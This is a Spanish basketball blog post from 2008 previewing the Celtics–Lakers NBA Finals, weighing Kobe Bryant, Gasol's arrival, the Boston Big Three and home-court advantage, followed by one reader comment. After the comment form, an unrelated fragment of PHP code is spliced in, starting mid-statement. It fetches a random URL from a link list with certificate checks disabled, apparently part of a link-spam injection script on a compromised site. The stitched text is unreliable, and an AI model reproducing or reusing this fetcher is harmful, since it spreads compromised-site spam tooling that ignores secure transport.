Previa Celtics – Lakers

04 de June de 2008 por TheDeerHunter

Antecedentes: 2-0 a favor de Celtics (ambos partidos sin Gasol)
Ventaja campo: Celtics.

Estamos ante la FINALÍSIMA, con mayúsculas. Mucho se ha hablado de la misma desde que Gasol desembarcó en L.A. La final soñada, los mitos, los títulos, las camisetas, los 20 años de espera… Tratando de escapar un poco de los tópicos, sería bueno tratar de analizar lo más objetivamente posible (si podemos) cuáles pueden ser las claves que llevarán al anillo:

“Big Three” Vs “MVP+Efecto Gasol”

Este podría ser el epílogo perfecto de lo que ha sido la temporada. Con todo lo que ha llovido… y al final todo podría resumirse en dos acontecimientos muy concretos, dos mutaciones súbitas, cuyo efecto decidirá finalmente quién será el campeón. El 31 de Julio de 2007 Boston anuncia el fichaje de Garnett convirtiéndose automáticamente en el mejor equipo de la competición. El 1 de Febrero de 2008 son los Lakers quien firman a Pau Gasol, entre otras cosas, para potenciar un juego interior muy mermado por las bajas.

    Desde esa fecha, son los californianos los que logran el mejor balance, algo que le facilita a Kobe, entre otros motivos, el MVP de la temporada. Son dos fechas históricas que no sólo deben entenderse como dos simples movimientos de jugadores sino como una cascada de acontecimientos que, en sí mismos, provocan que ambos equipos adquieran un estilo de juego determinado, que se va a poner en liza en esta final. Los Celtics cuentan con una extraordinaria defensa, sobre todo en estático, por lo que es de preveer que tratarán por todos los medios de llevar el juego a su terreno, ralentizándolo lo máximo posible. Los Lakers han demostrado gran capacidad de adaptación contra San Antonio y Utah, pero se sienten mucho más cómodos ofensivamente y tratarán de imponer un ritmo más dinámico. Quien logre prevalecer en este sentido tendrá mucho camino andado.

    Minimizar a Kobe Bryant.
    En lo que va de play-offs, si ha habido alguna clave en el éxito de los Lakers hasta ahora, ésa ha sido el excelso momento de juego por el que atraviesa el líder angelino. Si alguien quiere vencerles, obviamente, debe plantearse el modo de parar a quien hasta ahora ha sido imparable. Precísamente los Celtics tienen un buen bagaje en este sentido, pues lograron amargarle la vida a Lebron, y de qué manera. Por otro lado, hasta ahora las defensas que se le han planteado a Kobe han sido más bien individuales… Si logran minimizarle los Lakers estarán perdidos.

    Los emparejamientos contra Garnett y Pierce + la confirmación de Allen. ¿3 contra 1?
    Pocos equipos han podido contra Boston cuando sus tres estrellas han rendido a buen nivel. Hay muchas incógnitas sobre cómo Phil Jackson va a afrontar éste factor. De entrada, existen muchas dudas que rodean a Ray Allen y que sólo podría despejar él mismo. Con respecto a Pierce, en principio será Radmanovic quien lo defienda y es previsible que sufra mucho en ese sentido. No es de extrañar que Jackson vaya alternando con Walton y/o Vujacic… incluso Ariza, quién sabe. Con Garnett la cosa está todavía menos clara. ¿Odom con él y Gasol con Perkins o viceversa? ambas opciones tienen sus pros y sus contras, pero es justo en este punto es donde más se la juegan todos.

    El factor cancha y el sistema de partidos 2-3-2.
    Con lo determinante que ha sido este factor en estos play-offs, los Lakers pierden esta ventaja en el peor momento. Boston se ha mostrado especialmente beneficiado en este sentido y el sistema de competición podría beneficiar que Lakers empezara por primera vez contra las cuerdas, algo que no ha sucedido hasta la fecha. Mal dato para ellos.

    La intendencia.
    Los secundarios de Lakers han mostrado mucho más y más variado hasta la fecha que los secundarios de Celtics. Eso no quita que los Celtics tienen alguno que puede armarla de forma inesperada. No debe olvidarse tampoco la experiencia de campeones con la que cuenta Lakers. En Boston tienen a Cassell, que veremos si juega mucho, y a Posey…

    La partida entre estrategas.
    Aquí, mientras no se demuestre lo contrario, gana Phil Jackson de calle.

    Eso es todo, si no nos hemos dejado nada. Por supuesto, estáis todos invitados a completar el análisis. Mi pronóstico personal, en esta ocasión, me lo reservo… aunque muchos ya lo adivinaréis.

    Comenta

    Un comentario a esta entrada

    1. MagicJohnson32 dice:
      #1

      A ver a qué ritmo se juegan los partidos. Si son muy trabados y espesos, Celtics llevará todas las de ganar. Si no, ventaja Lakers. Puede pasar como en anteriores eliminatorias de los Lakers, que los partidos lejos de L.A. y eran muy diferentes a los partidos en el Staples.

      Creo que los Lakers llegan mejor preparados. Aunque falta por ver cómo reaccionarían en situaciones adversas y con la eliminatoria cuesta arriba.

      Buf, que empiece ya, por dios.

        Citar

    Deja un comentario

    html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>